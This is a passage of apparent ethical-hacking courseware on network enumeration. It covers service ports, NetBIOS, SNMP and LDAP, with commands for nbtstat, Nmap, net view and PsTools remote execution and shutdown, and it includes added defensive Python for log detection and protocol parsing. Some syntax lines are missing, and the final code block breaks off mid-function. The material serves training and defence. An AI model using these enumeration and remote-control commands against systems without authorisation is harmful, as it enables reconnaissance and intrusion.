| Hello | HELO |
| From | MAIL FROM |
| Recipient | RCPT TO |
| Data | DATA |
| Reset | RSET |
| Verify | VRFY |
| Expand | EXPN |
| Help | HELP |
| Quit | QUIT |

Table 4.1: SMTP commands and their respective syntaxes

TCP/UDP 162: SNMP Trap

An SNMP trap uses TCP/UDP port 162 to send notifications such as optional variable bindings and the sysUpTime value from an agent to a manager.
UDP 500: Internet Security Association and Key Management Protocol (ISAKMP)/Internet Key Exchange (IKE)

Internet Security Association and Key Management Protocol (ISAKMP)/Internet Key Exchange (IKE) is a protocol used to set up a security association (SA) in the IPsec protocol suite. It uses UDP port 500 to establish, negotiate, modify, and delete SAs and cryptographic keys in a virtual private network (VPN) environment.
TCP 22: Secure Shell (SSH)

Secure Shell (SSH) is a command-level protocol mainly used for managing various networked devices securely. It is generally used as an alternative to the unsecure Telnet protocol. SSH uses the client/server communication model, and the SSH server, by default, listens to its client on TCP port 22. Attackers may exploit the SSH protocol by brute-forcing SSH login credentials.
TCP/UDP 3268: Global Catalog Service

Microsoft's Global Catalog server, a domain controller that stores extra information, uses port 3268. Its database contains rows for every object in the entire organization, instead of rows for only the objects in one domain. Global Catalog allows one to locate objects from any domain without having to know the domain name. LDAP in the Global Catalog server uses port 3268. This service listens to port 3268 through a TCP connection. Administrators use port 3268 for troubleshooting issues in the Global Catalog by connecting to it using LDP.
TCP/UDP 5060, 5061: Session Initiation Protocol (SIP)

The Session Initiation Protocol (SIP) is a protocol used in Internet telephony for voice and video calls. It typically uses TCP/UDP port 5060 (non-encrypted signaling traffic) or 5061 (encrypted traffic with TLS) for SIP to servers and other endpoints.
TCP 20/21: File Transfer Protocol (FTP)

FTP is a connection-oriented protocol used for transferring files over the Internet and private networks. FTP is controlled on TCP port 21, and for data transmission, FTP uses TCP port 20 or some dynamic port numbers depending on the server configuration. If attackers identify that FTP server ports are open, then they perform enumeration on FTP to find information such as the software version and state of existing vulnerabilities to perform further exploitations such as the sniffing of FTP traffic and FTP brute-force attacks.
TCP 23: Telnet

The Telnet protocol is used for managing various networked devices remotely. It is an unsecure protocol because it transmits login credentials in the cleartext format. Therefore, it is mostly used in private networks. The Telnet server listens to its clients on port 23. Attackers can take advantage of the Telnet protocol to perform banner grabbing on other protocols such as SSH and SMTP, port-forwarding attacks, brute-forcing attacks on login credentials, etc.
UDP 69: Trivial File Transfer Protocol (TFTP)

TFTP is a connectionless protocol used for transferring files over the Internet. TFTP depends on UDP; therefore, it does not guarantee the proper transmission of the file to the destination. TFTP is mainly used to update or upgrade software and firmware on remote networked devices. It uses UDP port 69 for transferring files to a remote host. Attackers may exploit TFTP to install malicious software or firmware on remote devices.
TCP 179: Border Gateway Protocol (BGP)

BGP is widely used by Internet service providers (ISPs) to maintain huge routing tables and for efficiently processing Internet traffic. BGP routers establish sessions on TCP port 179. The misconfiguration of BGP may lead to various attacks such as dictionary attacks, resource-exhaustion attacks, flooding attacks, and hijacking attacks.
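The port list above doubles as a detection watchlist. The following Python is an added example, not EC-Council's code: it parses constructed firewall log lines (the `src=... dport=... action=...` format is an assumption, not any vendor's) and reports any source that probed several of the enumerable services listed above, whether the firewall allowed or denied the attempt.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# (protocol, port) -> service, taken from the list of enumerable services above.
ENUMERABLE_PORTS: Dict[Tuple[str, int], str] = {
    ("udp", 53): "DNS", ("tcp", 53): "DNS zone transfer",
    ("tcp", 139): "NetBIOS session (SMB)", ("tcp", 445): "SMB over TCP",
    ("udp", 161): "SNMP", ("udp", 162): "SNMP trap",
    ("tcp", 389): "LDAP", ("udp", 389): "LDAP", ("tcp", 2049): "NFS",
    ("tcp", 25): "SMTP", ("udp", 500): "ISAKMP/IKE", ("tcp", 22): "SSH",
    ("tcp", 3268): "Global Catalog", ("tcp", 5060): "SIP", ("udp", 5060): "SIP",
    ("tcp", 5061): "SIP over TLS", ("tcp", 20): "FTP data", ("tcp", 21): "FTP control",
    ("tcp", 23): "Telnet", ("udp", 69): "TFTP", ("tcp", 179): "BGP",
}

# Constructed log format (an assumption, not any vendor's): one connection per line.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"proto=(?P<proto>tcp|udp) dport=(?P<dport>\d+) action=(?P<action>allow|deny)$"
)

# Constructed sample: one host walks the enumerable ports, another is ordinary traffic.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z src=10.0.0.5 dst=10.0.1.10 proto=udp dport=161 action=allow
2024-05-01T10:00:02Z src=10.0.0.5 dst=10.0.1.10 proto=tcp dport=139 action=allow
2024-05-01T10:00:02Z src=10.0.0.5 dst=10.0.1.10 proto=tcp dport=445 action=deny
2024-05-01T10:00:03Z src=10.0.0.5 dst=10.0.1.20 proto=tcp dport=389 action=allow
2024-05-01T10:00:03Z src=10.0.0.5 dst=10.0.1.20 proto=tcp dport=2049 action=deny
2024-05-01T10:00:04Z src=10.0.0.5 dst=10.0.1.20 proto=tcp dport=25 action=allow
2024-05-01T10:00:05Z src=10.0.0.8 dst=10.0.1.10 proto=tcp dport=443 action=allow
2024-05-01T10:00:06Z src=10.0.0.8 dst=10.0.1.10 proto=tcp dport=22 action=allow
this line is malformed and must be skipped
"""


def parse_line(line: str) -> Optional[Tuple[str, str, str, int, str]]:
    """Return (src, dst, proto, dport, action), or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    return m["src"], m["dst"], m["proto"], int(m["dport"]), m["action"]


def services_by_source(lines: List[str]) -> Dict[str, Set[str]]:
    """Distinct enumerable services each source touched. Denied probes count too:
    a blocked SNMP or SMB attempt is still reconnaissance worth noticing."""
    touched: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        src, _dst, proto, dport, _action = rec
        service = ENUMERABLE_PORTS.get((proto, dport))
        if service is not None:
            touched[src].add(service)
    return touched


def enumeration_candidates(lines: List[str], min_services: int = 4) -> Dict[str, List[str]]:
    """Sources that probed at least min_services distinct enumerable services."""
    return {src: sorted(svcs) for src, svcs in services_by_source(lines).items()
            if len(svcs) >= min_services}


if __name__ == "__main__":
    for src, svcs in enumeration_candidates(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: probed {len(svcs)} enumerable services: {', '.join(svcs)}")
```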
NetBIOS Enumeration

Thus far, we discussed enumeration concepts and resources that provide valuable information. This section describes NetBIOS enumeration, the information obtained, and various NetBIOS enumeration tools. NetBIOS is considered first for enumeration because it extracts a large amount of sensitive information about the target network, such as users and network shares.

The first step in enumerating a Windows system is to take advantage of the NetBIOS API. NetBIOS was originally developed as an API for client software to access local area network (LAN) resources. Windows uses NetBIOS for file and printer sharing. The NetBIOS name is a unique 16-ASCII-character string used to identify network devices over TCP/IP; fifteen characters are used for the device name, and the sixteenth character is reserved for the service or name record type.

Attackers use NetBIOS enumeration to obtain the following:
- The list of computers that belong to a domain
- The list of shares on the individual hosts in a network
- Policies and passwords

An attacker who finds a Windows system with port 139 open can check to see which resources can be accessed or viewed on a remote system. However, to enumerate the NetBIOS names, the remote system must have enabled file and printer sharing. NetBIOS enumeration may enable an attacker to read or write to a remote computer system, depending on the availability of shares, or launch a DoS attack.
| Name | NetBIOS Code | Type | Information Obtained |
| <host name> | <00> | UNIQUE | Hostname |
| <domain> | <00> | GROUP | Domain name |
| <host name> | <03> | UNIQUE | Messenger service running for the computer |
| <username> | <03> | UNIQUE | Messenger service running for the logged-in user |
| <host name> | <20> | UNIQUE | Server service running |
| <domain> | <1D> | GROUP | Master browser name for subnet |
| <domain> | <1B> | UNIQUE | Domain master browser name, which identifies the primary domain controller (PDC) for the domain |
| <domain> | <1E> | GROUP | Browser service elections |

Table 4.2: NetBIOS name table
Nbtstat Utility

Source: https://docs.microsoft.com

Nbtstat is a Windows utility that helps in troubleshooting NetBIOS name resolution problems. The nbtstat command removes and corrects preloaded entries using several case-sensitive switches. Attackers use Nbtstat to enumerate information such as NetBIOS over TCP/IP (NetBT) protocol statistics, NetBIOS name tables for both local and remote computers, and the NetBIOS name cache. The syntax of the nbtstat command is as follows:

nbtstat [-a RemoteName] [-A IP Address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]

The table shown below lists various Nbtstat parameters and their respective functions.
| Nbtstat Parameter | Function |
| -a RemoteName | Displays the NetBIOS name table of a remote computer, where RemoteName is the NetBIOS computer name of the remote computer |
| -A IP Address | Displays the NetBIOS name table of a remote computer, specified by the IP address (in dotted decimal notation) of the remote computer |
| -c | Lists the contents of the NetBIOS name cache, the table of NetBIOS names and their resolved IP addresses |
| -R | Purges the name cache and reloads all #PRE-tagged entries from the Lmhosts file |
| -RR | Releases all names with the name server and re-registers |
| -S | Lists the NetBIOS sessions table converting destination IP addresses to computer NetBIOS names |

Table 4.3: Nbtstat parameters and their respective functions
The following are some examples of nbtstat commands.

- The nbtstat command "nbtstat -a <IP address of the remote machine>" can be executed to obtain the NetBIOS name table of a remote computer.

Figure 4.1: Nbtstat command to obtain the NetBIOS name table of a remote system

- The nbtstat command "nbtstat -c" can be executed to obtain the contents of the NetBIOS name cache.

Figure 4.2: Nbtstat command to obtain the contents of the NetBIOS name table
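As an added illustration that is not part of the courseware, the following Python parses the name table that an nbtstat query against a remote host prints and maps each entry to its meaning from Table 4.2, so a defender reviewing their own hosts can see exactly what is disclosed. The sample output, host name, domain and user name are constructed.

```python
import re
from typing import Dict, List, NamedTuple

# Constructed sample of what nbtstat -A <IP address> prints for a Windows host.
SAMPLE_NBTSTAT = """\
           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WIN-SRV01      <00>  UNIQUE      Registered
    CORP           <00>  GROUP       Registered
    WIN-SRV01      <20>  UNIQUE      Registered
    WIN-SRV01      <03>  UNIQUE      Registered
    JSMITH         <03>  UNIQUE      Registered
    CORP           <1E>  GROUP       Registered
    CORP           <1D>  UNIQUE      Registered
    CORP           <1B>  UNIQUE      Registered

    MAC Address = 00-0C-29-AA-BB-CC
"""


class NbEntry(NamedTuple):
    name: str
    suffix: str   # the two hex digits inside <>, i.e. the 16th byte of the NetBIOS name
    kind: str     # UNIQUE or GROUP


ENTRY_RE = re.compile(r"^\s*(\S+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+\w+")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

# Suffix meanings taken from Table 4.2 above.
ROLE_BY_SUFFIX: Dict[str, str] = {
    "20": "Server service running (file/printer shares reachable)",
    "1D": "Master browser for the subnet",
    "1B": "Domain master browser (primary domain controller)",
    "1E": "Takes part in browser service elections",
}


def parse_name_table(text: str) -> List[NbEntry]:
    """Pull (name, suffix, type) rows out of raw nbtstat output; other lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append(NbEntry(m.group(1), m.group(2).upper(), m.group(3)))
    return entries


def describe(entries: List[NbEntry]) -> Dict[str, object]:
    """Interpret the rows the way Table 4.2 does."""
    hostname = next((e.name for e in entries if e.suffix == "00" and e.kind == "UNIQUE"), None)
    domain = next((e.name for e in entries if e.suffix == "00" and e.kind == "GROUP"), None)
    users: List[str] = []
    roles: List[str] = []
    for e in entries:
        if e.suffix == "03" and e.kind == "UNIQUE" and e.name != hostname:
            users.append(e.name)          # Messenger name registered for the logged-in user
        elif e.suffix in ROLE_BY_SUFFIX:
            roles.append(ROLE_BY_SUFFIX[e.suffix])
    return {"hostname": hostname, "domain": domain, "logged_in_users": users, "roles": roles}


def exposure_findings(text: str) -> List[str]:
    """Defender view: everything an unauthenticated NetBIOS name query reveals about the host."""
    info = describe(parse_name_table(text))
    findings = []
    if info["hostname"]:
        findings.append(f"hostname disclosed: {info['hostname']}")
    if info["domain"]:
        findings.append(f"domain disclosed: {info['domain']}")
    findings += [f"logged-in user disclosed: {u}" for u in info["logged_in_users"]]
    findings += [f"role disclosed: {r}" for r in info["roles"]]
    mac = MAC_RE.search(text)
    if mac:
        findings.append(f"MAC address disclosed: {mac.group(1)}")
    return findings


if __name__ == "__main__":
    for finding in exposure_findings(SAMPLE_NBTSTAT):
        print(finding)
```

Every finding disappears together once file and printer sharing or NetBIOS over TCP/IP is disabled on interfaces that do not need it, which is the check this output is meant to drive.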
NetBIOS Enumeration Tools

NetBIOS enumeration tools explore and scan a network within a given range of IP addresses and lists of computers to identify security loopholes or flaws in networked systems. These tools also enumerate operating systems (OSs), users, groups, Security Identifiers (SIDs), password policies, services, service packs and hotfixes, NetBIOS shares, transports, sessions, disks and security event logs, etc.
NetBIOS Enumerator

Source: http://nbtenum.sourceforge.net

NetBIOS Enumerator is an enumeration tool that shows how to use remote network support and to deal with some other web protocols, such as SMB. As shown in the screenshot, attackers use NetBIOS Enumerator to enumerate details such as NetBIOS names, usernames, domain names, and media access control (MAC) addresses for a given range of IP addresses.
Figure 4.3: Screenshot of NetBIOS Enumerator
Nmap

Source: https://nmap.org

Attackers use the Nmap Scripting Engine (NSE) for discovering NetBIOS shares on a network. The nbstat script of NSE allows attackers to retrieve the target's NetBIOS names and MAC addresses. By default, the script displays the name of the computer and the logged-in user. However, if the verbosity is turned up, it displays all names related to that system. As shown in the screenshot, an attacker uses the following Nmap command to perform NetBIOS enumeration on a target host:

nmap --script nbstat.nse <target IP address>
Figure 4.4: Screenshot of Nmap command for NetBIOS enumeration

Figure 4.5: Screenshot of Nmap NetBIOS enumeration output

The following are some additional NetBIOS enumeration tools:
- Global Network Inventory (http://www.magnetosoft.com)
- Advanced IP Scanner (http://www.advanced-ip-scanner.com)
- Hyena (https://www.systemtools.com)
- Nsauditor Network Security Auditor (https://www.nsauditor.com)
Enumerating User Accounts

Source: https://docs.microsoft.com

Enumerating user accounts using the PsTools suite helps in controlling and managing remote systems from the command line. The following are some commands for enumerating user accounts.
- PsExec

PsExec is a lightweight Telnet replacement that can execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. PsExec's most powerful use case is the launch of interactive command prompts on remote systems and remote-enabling tools such as Ipconfig that otherwise cannot show information about remote systems. The syntax of the PsExec command is as follows:

psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-r servicename][-h][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
- PsFile

PsFile is a command-line utility that shows a list of files on a system that are opened remotely, and it can close opened files either by name or by a file identifier. The default behavior of PsFile is to list the files on the local system that are opened by remote systems. Typing a command followed by "-" displays information on the syntax for that command. The syntax of the PsFile command is as follows:
- PsGetSid

PsGetSid translates SIDs to their display name and vice versa. It works on built-in accounts, domain accounts, and local accounts. It also displays the SIDs of user accounts and translates an SID into the name that represents it. It works across the network to query SIDs remotely. The syntax of the PsGetSid command is as follows:
- PsKill

Running PsKill with a process ID directs it to kill the process of that ID on the local computer. If a process name is specified, PsKill will kill all processes that have that name. One need not install a client on the target computer to use PsKill to terminate a remote process. The syntax of the PsKill command is as follows:

pskill [- ] [-t] [\\computer [-u username] [-p password]] <process name | process id>
- PsInfo

PsInfo is a command-line tool that gathers key information about local or remote legacy Windows NT/2000 systems, including the type of installation, kernel build, registered organization and owner, number of processors and their type, amount of physical memory, installation date of the system, and expiration date in the case of a trial version. By default, PsInfo shows information for the local system. A remote computer name can be specified to obtain information for a remote system. The syntax of the PsInfo command is as follows:

psinfo [[\\computer[,computer[,..] | @file [-u user [-p psswd]]] [-h] [-s] [-d] [-c [-t delimiter]] [filter]
- PsList

PsList is a command-line tool that displays central processing unit (CPU) and memory information or thread statistics. Tools in the Resource Kits, pstat and pmon, show different types of data only for the processes on the system on which the tools are run.
- PsLoggedOn

PsLoggedOn is an applet that displays both the locally logged-in users and users logged in via resources for either the local computer or a remote one. If a username is specified instead of a computer,

- PsLogList

situations where the user's credentials would not permit access to the Event Log, and PsLogList retrieves message strings from the computer on which the event log is stored. The default function of PsLogList is to display the contents of the System Event Log on the local computer with visually friendly formatting. The syntax of the PsLogList command is as follows:

psloglist [- ] [\\computer[,computer[,...] | @file [-u username [-p password]]] [-s [-t delimiter]] [-m #|-n #|-h #|-d #|-w][-c][-x][-r][-a mm/dd/yy][-b mm/dd/yy][-f filter] [-i ID[,ID[,...] | -e ID[,ID[,...]]] [-o event source[,event source][,..]]] [-q event source[,event source][,..]]] [-l event log file] <eventlog>
- PsPasswd

PsPasswd can change an account password on local or remote systems, and administrators can create batch files that run PsPasswd on the computers they manage to perform a mass change of the administrator password. PsPasswd uses Windows password reset APIs; therefore, it does not send passwords over the network in the cleartext. The syntax of the PsPasswd command is as follows:

pspasswd [[\\computer[,computer[,..] | @file [-u user [-p psswd]]] Username [NewPassword]
- PsShutdown

PsShutdown can shut down or reboot a local or remote computer. It requires no manual installation of client software. The syntax of the PsShutdown command is as follows:

psshutdown [[\\computer[,computer[,..] | @file [-u user [-p psswd]]] -s|-r|-h|-d|-k|-a|-l|-o [-f] [-c] [-t nn|h:m] [-n s] [-v nn] [-e [u|p]:xx:yy] [-m "message"]
Enumerating Shared Resources Using Net View

Net View is a command-line utility that displays a list of computers in a specified workgroup or shared resources available on a specified computer. It can be used in the following ways.

net view \\<computername>

In the above command, <computername> is the name or IP address of a specific computer, the resources of which are to be displayed.

net view \\<computername> /ALL

The above command displays the shares on the specified remote computer, along with hidden shares.

net view /domain

The above command displays all the shares in the domain.

net view /domain:<domain name>

The above command displays all the shares on the specified domain.
The screenshot shows the shared resources available on the specified computer.

Figure 4.6: Output of Net View command
SNMP Enumeration

SNMP allows network administrators to manage network devices from a remote location. However, SNMP has many security vulnerabilities, such as a lack of auditing. Attackers may take advantage of these vulnerabilities to perform account and device enumeration. This section describes SNMP enumeration, the information extracted via SNMP enumeration, and various SNMP enumeration tools used to enumerate user accounts and devices on a target system.
SNMP is an application-layer protocol that runs on UDP and maintains and manages routers, hubs, and switches on an IP network. SNMP agents run on Windows and Unix networks on networking devices.

SNMP enumeration is the process of creating a list of the user's accounts and devices on a target computer using SNMP. SNMP employs two types of software components for communication: the SNMP agent and the SNMP management station. The SNMP agent is located on the networking device, and the SNMP management station communicates with the agent.

Almost all the network infrastructure devices such as routers and switches contain an SNMP agent for managing system or devices. The SNMP management station sends requests to the agent; after receiving the request, the agent replies. Both requests and replies are configuration variables accessible by the agent software. SNMP management stations send requests to set values to some variables. Traps let the management station know if an abnormal event such as a reboot or an interface failure has occurred at the agent's side.

SNMP contains the following two passwords for configuring and accessing the SNMP agent from the management station.

- Read Community String
  o The configuration of the device or system can be viewed with the help of this password.
  o These strings are public.

- Read/Write Community String
  o The device configuration can be changed or edited using this password.
  o These strings are private.

Attackers enumerate SNMP to extract information about network resources, such as hosts, routers, devices, and shares, and network information, such as ARP tables, routing tables, device-specific information, and traffic statistics.

Commonly used SNMP enumeration tools include OpUtils (https://www.manageengine.com) and Network Performance Monitor (https://www.solarwinds.com).
Working of SNMP
SNMP uses a distributed architecture comprising SNMP managers, SNMP agents, and several related components. The following are some commands associated with SNMP.

- GetRequest: Used by the SNMP manager to request information from an SNMP agent
- GetNextRequest: Used by the SNMP manager continuously to retrieve all the data stored in an array or table
- GetResponse: Used by an SNMP agent to satisfy a request made by the SNMP manager
- SetRequest: Used by the SNMP manager to modify the value of a parameter within an SNMP agent's management information base (MIB)
- Trap: Used by an SNMP agent to inform the pre-configured SNMP manager of a certain event

The communication process between an SNMP manager and agent is as follows.

- The SNMP manager (Host X, 10.10.2.1) uses the GetRequest command to send a request to the SNMP agent. To perform this, it uses an SNMP API library such as the Microsoft SNMP API (Wsnmp32.dll).
- The SNMP agent (Host Y) receives the message and verifies if the community string (Compinfo) is present on its MIB, checks the request against its list of access permissions for that community, and verifies the source IP address.
- If the SNMP agent does not find the community string or access permission in Host Y's MIB database and the SNMP service is set to send an authentication trap, it sends an authentication failure trap to the specified trap destination, Host Z.
- The master agent component of the SNMP agent calls the appropriate extension agent to retrieve the requested session information from the MIB.
- Using the session information retrieved from the extension agent, the SNMP service forms a return SNMP message that contains the number of active sessions and the destination IP address of the SNMP manager, Host X (10.10.2.1).
- Host Y sends the response to Host X.

Figure 4.7: Illustration of the working of SNMP
Management Information Base (MIB)
MIB is a virtual database containing a formal description of all the network objects that SNMP manages. It is a collection of hierarchically organized information. It provides a standard representation of the SNMP agent's information and storage. MIB elements are recognized using object identifiers (OIDs). An OID is the numeric name given to an object and begins with the root of the MIB tree. The OID can uniquely identify the object in the MIB hierarchy. MIB-managed objects include scalar objects, which define a single object instance, and tabular objects, which define a group of related object instances. OIDs include the object's type (such as counter, string, or address), access level (such as read or read/write), size restrictions, and range information. The SNMP manager converts the OIDs into a human-readable display using the MIB as a codebook.

A user can access the contents of the MIB by using a web browser either by entering the IP address and Lseries.mib or by entering the DNS library name and Lseries.mib. For example, http://IP.Address/Lseries.mib or http://library_name/Lseries.mib. Microsoft provides the list of MIBs that are installed with the SNMP service in the Windows resource kit. The major MIBs are as follows:

- DHCP.MIB: Monitors network traffic between DHCP servers and remote hosts
- HOSTMIB.MIB: Monitors and manages host resources
- LNMIB2.MIB: Contains object types for workstation and server services
- MIB_II.MIB: Manages TCP/IP-based Internet using a simple architecture and system
- WINS.MIB: For the Windows Internet Name Service (WINS)
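The following Python is an added example, not EC-Council's or any vendor's code, that reproduces the Host X / Host Y / Host Z exchange from "Working of SNMP" together with the OID encoding just described, using hand-rolled BER so it runs offline. The community string Compinfo and the manager address 10.10.2.1 come from the scenario above; the sysUpTime value, the trap destination address and the request IDs are constructed. It also makes visible why defenders replace default community strings: the string travels in cleartext in every datagram.

```python
from typing import Dict, List, Optional, Tuple

INTEGER, OCTET_STRING, NULL, OID, SEQUENCE, TIMETICKS = 0x02, 0x04, 0x05, 0x06, 0x30, 0x43  # BER tags
GET_REQUEST, GET_RESPONSE, TRAP_V2 = 0xA0, 0xA2, 0xA7     # SNMPv2c PDU tags (version field = 1)
SYS_UPTIME = "1.3.6.1.2.1.1.3.0"          # MIB-II system.sysUpTime.0
SNMP_TRAP_OID = "1.3.6.1.6.3.1.1.4.1.0"   # snmpTrapOID.0, carried in every v2 trap
AUTH_FAILURE = "1.3.6.1.6.3.1.1.5.5"      # snmpTraps.authenticationFailure

def _length(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")   # long form: 0x80|count, then count
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _length(len(body)) + body

def enc_int(value: int, tag: int = INTEGER) -> bytes:
    return tlv(tag, value.to_bytes((value.bit_length() + 8) // 8, "big", signed=True))

def enc_oid(dotted: str) -> bytes:
    """Dotted OID -> BER: the first two arcs share one byte, the rest are base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        while arc > 0x7F:
            arc >>= 7
            chunk.append(0x80 | (arc & 0x7F))   # high bit set on every byte but the last
        out.extend(reversed(chunk))
    return tlv(OID, bytes(out))

def dec_oid(body: bytes) -> str:
    arcs, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def _read(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2     # returns (tag, body, next position)
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def build_message(community: str, pdu_type: int, request_id: int,
                  varbinds: List[Tuple[str, bytes]]) -> bytes:
    vbl = b"".join(tlv(SEQUENCE, enc_oid(oid) + value) for oid, value in varbinds)
    pdu = tlv(pdu_type, enc_int(request_id) + enc_int(0) + enc_int(0) + tlv(SEQUENCE, vbl))
    # The community string is a plain OCTET STRING: anyone sniffing UDP 161/162 reads it.
    return tlv(SEQUENCE, enc_int(1) + tlv(OCTET_STRING, community.encode()) + pdu)

def parse_message(msg: bytes) -> Dict[str, object]:
    _, body, _ = _read(msg, 0)
    _, _, p = _read(body, 0)                      # version
    _, community, p = _read(body, p)
    pdu_type, pdu, _ = _read(body, p)
    _, rid, q = _read(pdu, 0)
    _, _, q = _read(pdu, q)                       # error-status
    _, _, q = _read(pdu, q)                       # error-index
    _, vbl, _ = _read(pdu, q)
    varbinds, q = [], 0
    while q < len(vbl):
        _, vb, q = _read(vbl, q)
        _, oid, r = _read(vb, 0)
        vtag, vbody, _ = _read(vb, r)
        if vtag in (INTEGER, TIMETICKS):
            value: object = int.from_bytes(vbody, "big", signed=True)
        elif vtag == OID:
            value = dec_oid(vbody)
        else:
            value = vbody                         # NULL / OCTET STRING kept raw
        varbinds.append((dec_oid(oid), value))
    return {"community": community.decode(), "pdu_type": pdu_type,
            "request_id": int.from_bytes(rid, "big", signed=True), "varbinds": varbinds}

class Agent:
    """Host Y: verifies community string and source address before answering."""
    def __init__(self, community: str, manager_ip: str, trap_dest: str) -> None:
        self.community, self.manager_ip, self.trap_dest = community, manager_ip, trap_dest
        self.mib: Dict[str, bytes] = {SYS_UPTIME: enc_int(123456, TIMETICKS)}  # constructed value
        self.traps_sent: List[Tuple[str, bytes]] = []   # (destination, datagram)

    def handle(self, datagram: bytes, source_ip: str) -> Optional[bytes]:
        req = parse_message(datagram)
        if req["community"] != self.community or source_ip != self.manager_ip:
            trap = build_message(self.community, TRAP_V2, req["request_id"], [
                (SYS_UPTIME, self.mib[SYS_UPTIME]), (SNMP_TRAP_OID, enc_oid(AUTH_FAILURE))])
            self.traps_sent.append((self.trap_dest, trap))
            return None                           # no reply to the requester; trap goes to Host Z
        answers = [(oid, self.mib.get(oid, tlv(NULL, b""))) for oid, _ in req["varbinds"]]
        return build_message(self.community, GET_RESPONSE, req["request_id"], answers)

def manager_get(community: str, request_id: int, oid: str) -> bytes:
    """Host X: a GetRequest for one OID; the value slot is NULL in a request."""
    return build_message(community, GET_REQUEST, request_id, [(oid, tlv(NULL, b""))])
```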
SNMPEnumerationTools
SNMP enumeration tools are used to scan a single IP address or a range of IP addresses of SNMP-enabled network devices to monitor, diagnose, and troubleshoot security threats.
▪ Snmpcheck (snmp_enum Module)
Source: http://www.nothink.org
Snmpcheck is an open-source tool distributed under the GNU General Public License (GPL). Its goal is to automate the process of gathering information on any device with SNMP support (Windows, Unix-like, network appliances, printers, etc.). Snmpcheck allows the enumeration of SNMP devices and places the output in a user-friendly, human-readable format. It could be useful for penetration testing or systems monitoring.
Attackers use this tool to gather information about the target, such as contact, description, write access, devices, domain, hardware and storage information, hostname, Internet Information Services (IIS) statistics, IP forwarding, listening UDP ports, location, mount points, network interfaces, network services, routing information, software components, system uptime, TCP connections, total memory, uptime, and user accounts.
Figure 4.8: Screenshot of snmpcheck showing system information
▪ SoftPerfect Network Scanner
Source: https://www.softperfect.com
SoftPerfect Network Scanner can ping computers, scan ports, discover shared folders, and retrieve practically any information about network devices via Windows Management Instrumentation (WMI), SNMP, Hypertext Transfer Protocol (HTTP), SSH, and PowerShell. It also scans for remote services, registry, files, and performance counters; offers flexible filtering and display options; and exports NetScan results to a variety of formats ranging from Extensible Markup Language (XML) to JavaScript Object Notation (JSON). Moreover, SoftPerfect Network Scanner can check for a user-defined port and report if one is open. In addition, it can resolve hostnames and auto-detect the local and external IP range. It supports remote shutdown and Wake-on-LAN. Attackers use this tool to gather information about a shared folder and network devices.
Figure 4.20: Screenshot of SoftPerfect Network Scanner
The following are some additional SNMP enumeration tools:
▪ Network Performance Monitor (https://www.solarwinds.com)
▪ OpUtils (https://www.manageengine.com)
▪ PRTG Network Monitor (https://www.paessler.com)
▪ Engineer's Toolset (https://www.solarwinds.com)
LDAP Enumeration
Various protocols enable communication and manage data transfer between network resources. All these protocols carry valuable information about network resources along with the data. An external user who successfully enumerates that information by manipulating the protocols can break into the network and may misuse the network resources. The Lightweight Directory Access Protocol (LDAP) is one such protocol that accesses the directory listings. This section focuses on LDAP enumeration, the information extracted via LDAP enumeration, and LDAP enumeration tools.
LDAP is an Internet protocol for accessing distributed directory services. LDAP accesses directory listings within Active Directory or from other directory services. LDAP is a hierarchical or logical form of a directory, similar to a company's organizational chart. Directory services may provide any organized set of records, often in a hierarchical and logical structure, such as a corporate email directory. It uses DNS for quick lookups and the fast resolution of queries. A client starts an LDAP session by connecting to a Directory System Agent (DSA), typically on TCP port 389, and sends an operation request to the DSA. The Basic Encoding Rules (BER) format is used to transmit information between the client and server.
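As an added example (not from the courseware), the following encodes the BindRequest a client sends to the DSA on TCP port 389 in BER and decodes it, distinguishing an anonymous bind from a simple bind that carries a cleartext password; the DN and password are constructed values.

```python
"""Added example (not part of the CEH courseware): the first operation a
client sends to a Directory System Agent on TCP 389, a BindRequest, encoded
with the Basic Encoding Rules (BER) as it travels on the wire, plus a decoder
that tells an anonymous bind from a simple bind carrying a cleartext password.
The DN and password used below are constructed sample values.
"""
from typing import Tuple

# ASN.1/BER tags used by the LDAP BindRequest (RFC 4511).
SEQUENCE, INTEGER, OCTET_STRING = 0x30, 0x02, 0x04
BIND_REQUEST = 0x60          # [APPLICATION 0], constructed
SIMPLE_AUTH = 0x80           # [0] primitive: simple authentication


def tlv(tag: int, value: bytes) -> bytes:
    """Encode one BER tag-length-value with a definite length."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    octets = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(octets)]) + octets + value


def ber_int(v: int) -> bytes:
    """Two's-complement INTEGER; an extra octet keeps positive values positive."""
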